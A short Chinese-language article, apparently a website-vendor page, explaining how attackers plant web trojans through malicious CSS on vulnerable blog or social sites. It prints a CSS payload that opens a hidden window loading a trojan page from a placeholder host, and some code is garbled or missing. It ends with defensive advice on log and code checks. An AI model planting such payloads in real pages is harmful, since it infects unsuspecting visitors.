旅游網(wǎng)站管理系統(tǒng)攻防CSS掛馬實錄

申請免費試用、咨詢電話：400-8352-114

    旅游網(wǎng)站管理系統(tǒng)攻CSS掛馬方式較多，但主流的方式是通過有漏洞的博客或者SNS社交網(wǎng)站系統(tǒng)，將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。
    方式1：
    Body
    “background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式，這段惡意代碼主要是通過“background-image”配合t代碼讓網(wǎng)頁木馬悄悄地在用戶的電腦中運行。
    那如何將這段CSS惡意代碼掛到正常的網(wǎng)頁中去呢?黑客可以將生成好的網(wǎng)頁木馬放到自己指定的位置，然后將該段惡意代碼寫入掛馬網(wǎng)站的網(wǎng)頁中，或者掛馬網(wǎng)頁所調(diào)用的CSS文件中。
    小百科：
    使用Body對象元素，主要是為了讓對象不再改變整個網(wǎng)頁文檔的內(nèi)容，通過Body對象的控制，可以將內(nèi)容或者效果控制在指定的大小內(nèi)，如同使用DIV對象那樣精確地設置大小。
    方式2：
    Body
    background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))
    方式1的CSS掛馬技術(shù)，在運行時會出現(xiàn)空白的頁面，影響網(wǎng)頁訪問者正常的訪問，因此比較容易發(fā)現(xiàn)。不過在方式2中的這段代碼，使用了t的Open開窗，通過新開一個隱藏的窗口，在后臺悄悄地運行新窗口并激活訪問網(wǎng)頁溢出木馬頁面，不會影響訪問者觀看網(wǎng)頁內(nèi)容，因此更加隱蔽。
    防網(wǎng)絡服務器被掛馬，通常會出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新，掛馬種類時刻都在變換，通過客戶端的反映來發(fā)現(xiàn)服務器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務器日志，發(fā)現(xiàn)異常信息，經(jīng)常檢查網(wǎng)站代碼，使用網(wǎng)頁木馬檢測系統(tǒng)，進行排查。